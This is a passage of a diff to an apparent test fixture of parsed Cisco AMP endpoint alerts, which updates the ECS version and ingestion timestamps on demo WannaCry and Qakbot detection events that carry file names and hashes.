 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -3809,7 +3809,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -3839,7 +3839,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843654448Z",
+ "ingested": "2021-09-13T18:07:04.510414604Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -3894,7 +3894,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -3924,7 +3924,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843656334Z",
+ "ingested": "2021-09-13T18:07:04.510416464Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -3990,7 +3990,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -4022,7 +4022,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843658227Z",
+ "ingested": "2021-09-13T18:07:04.510418340Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -4092,7 +4092,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4124,7 +4124,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843660456Z", + "ingested": "2021-09-13T18:07:04.510420342Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -4176,7 +4176,7 @@ { "@timestamp": "2021-01-14T19:10:32.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4194,7 +4194,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:31:29.843662300Z", + "ingested": "2021-09-13T18:07:04.510422223Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6412662859016176000", "kind": "alert" @@ -4231,7 +4231,7 @@ { "@timestamp": "2021-01-14T19:10:31.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4249,7 +4249,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:31:29.843664186Z", + "ingested": "2021-09-13T18:07:04.510424077Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6412662854721208000", "kind": "alert" @@ -4291,7 +4291,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4311,7 +4311,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843666081Z", + "ingested": "2021-09-13T18:07:04.510425946Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4366,7 +4366,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4386,7 +4386,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843667970Z", + "ingested": "2021-09-13T18:07:04.510427827Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4441,7 +4441,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4461,7 +4461,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843669890Z", + "ingested": "2021-09-13T18:07:04.510429716Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4518,7 +4518,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4542,7 +4542,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843671791Z", + "ingested": "2021-09-13T18:07:04.510431561Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -4597,7 +4597,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4621,7 +4621,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843673656Z", + "ingested": "2021-09-13T18:07:04.510433405Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -4676,7 +4676,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4700,7 +4700,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843675538Z", + "ingested": "2021-09-13T18:07:04.510435245Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -4753,7 +4753,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4773,7 +4773,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843677434Z", + "ingested": "2021-09-13T18:07:04.510437110Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -4839,7 +4839,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4869,7 +4869,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843679334Z", + "ingested": "2021-09-13T18:07:04.510438994Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -4939,7 +4939,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
